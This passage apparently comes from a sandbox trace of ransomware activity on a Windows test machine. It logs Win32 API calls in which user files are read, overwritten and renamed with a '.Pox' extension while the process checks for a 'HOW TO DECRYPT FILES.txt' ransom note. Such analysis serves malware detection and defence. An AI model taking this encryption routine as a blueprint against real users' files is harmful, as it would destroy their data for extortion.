lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0038.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0038.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3", lpFilePart=0x0) returned 0x4a [0038.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0038.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zh5khkzpc6aokc3jgphn\\80sx6n6htec.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.214] GetFileType (hFile=0x26c) returned 0x1 [0038.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0038.214] GetFileType (hFile=0x26c) returned 0x1 [0038.214] WriteFile (in: hFile=0x26c, lpBuffer=0x2477158*, nNumberOfBytesToWrite=0x6950, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x2477158*, lpNumberOfBytesWritten=0x3ae4f0*=0x6950, lpOverlapped=0x0) returned 1 [0038.215] CloseHandle (hObject=0x26c) returned 1 [0038.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3", lpFilePart=0x0) returned 0x4a [0038.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3.Pox", lpFilePart=0x0) returned 0x4e [0038.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0038.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zh5khkzpc6aokc3jgphn\\80sx6n6htec.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55866910, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0xb41e1e10, ftLastAccessTime.dwHighDateTime=0x1d4d0f3, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6950)) returned 1 [0038.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0038.216] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zh5khkzpc6aokc3jgphn\\80sx6n6htec.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zh5KHKzPc6AOkC3JGPhN\\80Sx6N6hteC.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zh5khkzpc6aokc3jgphn\\80sx6n6htec.mp3.pox")) returned 1 [0038.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.217] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpFilePart=0x0) returned 0x23 [0038.217] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpFilePart=0x0) returned 0x24 [0038.217] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f88 [0038.217] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.217] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.217] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0038.217] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0038.218] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0038.218] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.218] FindClose (in: hFindFile=0x405f88 | out: hFindFile=0x405f88) returned 1 [0038.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.218] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpFilePart=0x0) returned 0x23 [0038.218] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpFilePart=0x0) returned 0x24 [0038.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f88 [0038.218] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.219] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.219] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0038.219] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0038.219] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0038.219] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0038.219] FindClose (in: hFindFile=0x405f88 | out: hFindFile=0x405f88) returned 1 [0038.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x2f [0038.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.221] GetFileType (hFile=0x26c) returned 0x1 [0038.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.221] GetFileType (hFile=0x26c) returned 0x1 [0038.221] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x1e6 [0038.221] ReadFile (in: hFile=0x26c, lpBuffer=0x247fcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x247fcb0*, lpNumberOfBytesRead=0x3ae570*=0x1e6, lpOverlapped=0x0) returned 1 [0038.222] CloseHandle (hObject=0x26c) returned 1 [0038.255] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.255] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.255] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x2f [0038.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.256] GetFileType (hFile=0x26c) returned 0x1 [0038.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.256] GetFileType (hFile=0x26c) returned 0x1 [0038.256] WriteFile (in: hFile=0x26c, lpBuffer=0x24ce6e8*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x24ce6e8*, lpNumberOfBytesWritten=0x3ae538*=0x1f0, lpOverlapped=0x0) returned 1 [0038.257] CloseHandle (hObject=0x26c) returned 1 [0038.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x2f [0038.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.Pox", lpFilePart=0x0) returned 0x33 [0038.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.258] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28fd5cc0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1f0)) returned 1 [0038.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.258] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.pox")) returned 1 [0038.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x31 [0038.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.259] GetFileType (hFile=0x26c) returned 0x1 [0038.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.259] GetFileType (hFile=0x26c) returned 0x1 [0038.259] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x3a1 [0038.259] ReadFile (in: hFile=0x26c, lpBuffer=0x24cfd04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24cfd04*, lpNumberOfBytesRead=0x3ae570*=0x3a1, lpOverlapped=0x0) returned 1 [0038.260] CloseHandle (hObject=0x26c) returned 1 [0038.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x31 [0038.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.295] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.296] GetFileType (hFile=0x26c) returned 0x1 [0038.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.296] GetFileType (hFile=0x26c) returned 0x1 [0038.296] WriteFile (in: hFile=0x26c, lpBuffer=0x251f008*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x3ae538, lpOverlapped=0x0 | out: lpBuffer=0x251f008*, lpNumberOfBytesWritten=0x3ae538*=0x3b0, lpOverlapped=0x0) returned 1 [0038.297] CloseHandle (hObject=0x26c) returned 1 [0038.298] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x31 [0038.298] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.Pox", lpFilePart=0x0) returned 0x35 [0038.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.298] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29021f80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0038.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.298] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.pox")) returned 1 [0038.299] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x34 [0038.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 